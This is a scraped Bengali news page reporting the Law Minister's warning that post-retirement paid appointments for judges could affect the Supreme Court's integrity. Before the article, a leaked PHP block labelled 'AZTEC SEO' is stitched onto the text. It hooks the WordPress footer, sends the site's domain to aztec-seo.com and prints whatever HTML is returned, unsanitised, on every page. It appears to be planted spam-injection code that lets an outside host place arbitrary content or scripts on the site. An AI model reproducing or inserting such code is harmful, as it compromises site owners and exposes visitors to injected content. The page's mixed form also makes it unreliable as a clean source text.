/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); অবসরের পর নিয়োগের সুযোগ সুপ্রিম কোর্টের ওপর প্রভাব ফেলতে পারে: আইনমন্ত্রী | Dhaka Sky News

হাম ও উপসর্গে আরও ৭ শিশুর মৃত্যু

আগের সংবাদ

সংবাদ সম্মেলনে আইনমন্ত্রী ১৬টি অধ্যাদেশ নিয়ে কোনো অস্বচ্ছতা নেই

পরের সংবাদ

অবসরের পর নিয়োগের সুযোগ সুপ্রিম কোর্টের ওপর প্রভাব ফেলতে পারে: আইনমন্ত্রী

যুগান্তর প্রতিবেদন

প্রকাশিত: April 13, 2026 , 6:56 pm

আইনমন্ত্রী মো. আসাদুজ্জামান বলেছেন, অবসরের পর বিচারপতিদের লাভজনক পদে নিয়োগ দেওয়ার প্রস্তাব সুপ্রিম কোর্টের সততা বা অখণ্ডতাকে প্রভাবিত করতে পারে।

সুপ্রিম কোর্ট অডিটোরিয়ামে অ্যাটর্নি জেনারেলের কার্যালয় ও ইউএনডিপি আয়োজিত যৌথ ইন্টার্নশিপ কর্মসূচির সমাপনী অনুষ্ঠানে প্রধান অতিথির বক্তব্যে এ সতর্কবার্তা দেন তিনি।
আইনমন্ত্রী বলেন, ন্যায়বিচার নিশ্চিত করার নামে এক অবসরপ্রাপ্ত জেলা জজ একজন ক্লায়েন্টের কাছ থেকে ১ কোটি ২৫ লাখ টাকা নিয়েছেন—এমন অভিযোগ রয়েছে। এ ধরনের ঘটনা ‘অনাকাঙ্ক্ষিত’।

তিনি আরও বলেন, অ্যাটর্নি জেনারেলের কার্যালয়ে সংস্কার প্রয়োজন। এই কার্যালয়ের জন্য বাজেট বৃদ্ধি ও বার কাউন্সিল পরীক্ষাকে আধুনিকায়নের উদ্যোগ নেওয়া হচ্ছে।